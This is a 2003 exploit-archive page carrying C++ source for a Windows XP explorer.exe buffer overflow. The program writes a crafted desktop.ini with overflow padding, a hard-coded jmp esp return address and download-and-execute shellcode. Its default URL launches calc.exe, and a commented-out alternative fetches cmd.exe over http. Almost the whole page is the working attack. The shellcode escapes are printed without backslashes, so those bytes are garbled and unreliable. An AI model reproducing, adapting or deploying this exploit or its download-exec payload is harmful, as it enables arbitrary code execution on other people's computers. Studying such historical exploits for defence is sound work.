MS Windows XP (explorer.exe) Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MS Windows XP (explorer.exe) Buffer Overflow Exploit
# Published : 2003-05-21
# Author : einstein
# Previous Title : Mandrake Linux 8.2 /usr/mail local exploit (d86mail.pl)
# Next Title : BSDi suidperl Local Stack Buffer Overflow Exploit

#include <fstream.h>
#include <string.h>
#include <stdio.h>
#include <windows.h>
#include <direct.h>

char shellcode[]=
//download url and exec shellcode
//doesn't have any hardcoded values
//except the base address of the program
//searches the import table for 
//LoadLibraryA, GetProcAddress and ExitProcess.
//by .einstein., dH team.
  "x81xecx40x1fx00x00xe8x00x00x00x00x5dx83xedx0bxbfx61x57" 
  "x7ax74xe8x8cx00x00x00x89xbdx17x01x00x00xbfx65x1dx22x74" 
  "xe8x7cx00x00x00x89xbdx1bx01x00x00xbfx17x75x79x70xe8x6c" 
  "x00x00x00x89xbdx1fx01x00x00x8dx85x2cx01x00x00x50x2exff" 
  "x95x17x01x00x00x8dx9dx33x01x00x00x53x50x2exffx95x1bx01" 
  "x00x00x6ax00x6ax00x8dx8dx4ex01x00x00x51x8dx8dx5cx01x00" 
  "x00x51x6ax00xffxd0x8dx85x23x01x00x00x50x2exffx95x17x01" 
  "x00x00x8dx9dx46x01x00x00x53x50x2ex8bx9dx1bx01x00x00xff" 
  "xd3x6ax01x8dx8dx4ex01x00x00x51xffxd0x6ax00x2exffx95x1f" 
  "x01x00x00xbbx3cx00x00x01x8bx0bx81xc1x04x00x00x01x8dx41" 
  "x14x8bx70x68x81xc6x00x00x00x01x8bx06x83xf8x00x74x51x05" 
  "x00x00x00x01x8bx56x10x81xc2x00x00x00x01x8bx18x8bxcbx81" 
  "xe1x00x00x00x80x83xf9x00x75x2ax81xc3x00x00x00x01x83xc3" 
  "x02x33xc9x32x0bxc1xc1x08x43x80x3bx00x75xf5x3bxcfx75x04" 
  "x8bx3axebx16x83xc2x04x83xc0x04x66x83x38x00x75xc7x83xc6" 
  "x14x8bx10x83xfax00x74xa8xc3x00x00x00x00x00x00x00x00x00" 
  "x00x00x00x4bx45x52x4ex45x4cx33x32x00x55x52x4cx4dx4fx4e" 
  "x00x55x52x4cx44x6fx77x6ex6cx6fx61x64x54x6fx46x69x6cx65" 
  "x41x00x57x69x6ex45x78x65x63x00x5cx7ex57x52x46x35x36x33" 
  "x34x2ex74x6dx70x00";

char unicode_header[] = "xFFxFE";
char shell_header[] = "[.ShellClassInfo]x0dx0a";

#define OVERFLOW_LEN 0xA1C


void main()
{
  char url[]="file://c:/winnt/system32/calc.exe";
 // char url[]="http://localhost/cmd.exe";
  char eip[] = "xccx59xfbx77"; //0x77fb59cc - WinXP SP1 ntdll.dll (jmp esp)


  char path[500]; 
  strcpy(path,"domain HELL team");
  mkdir(path);
  SetFileAttributes(path,FILE_ATTRIBUTE_READONLY);
  strcat(path,"\desktop.ini");

  ofstream out(path,ios::out+ios::binary);
  out.write(unicode_header,sizeof(unicode_header)-1);
  char zero = 0;
  for (int i=0;i<strlen(shell_header);i++)
  {
    out.write(&shell_header[i],1);
    out.write(&zero,1);
  }
  char pad = 'B';
  for (i=0;i<OVERFLOW_LEN;i++) out.write(&pad,1);
  char ebp[] = "1234";
  out.write(ebp,4);

  char pad0 = 1;

  out.write(eip,4);

  char pad2 = 'C';
  for (i=0;i<12;i++) out.write(&pad,1);
 

  out.write(shellcode,sizeof(shellcode)-1);
  out.write(url,sizeof(url));
 
  int len = sizeof(shellcode)-1+sizeof(url);
  printf("shellcode+url: %d bytesn",len);
  if (len%2 == 1) 
  {
    printf("it's odd, so add 1 extra byte");
    out.write(&pad2,1);
  }
 
  out.close();

}



// www.Syue.com [2003-05-21]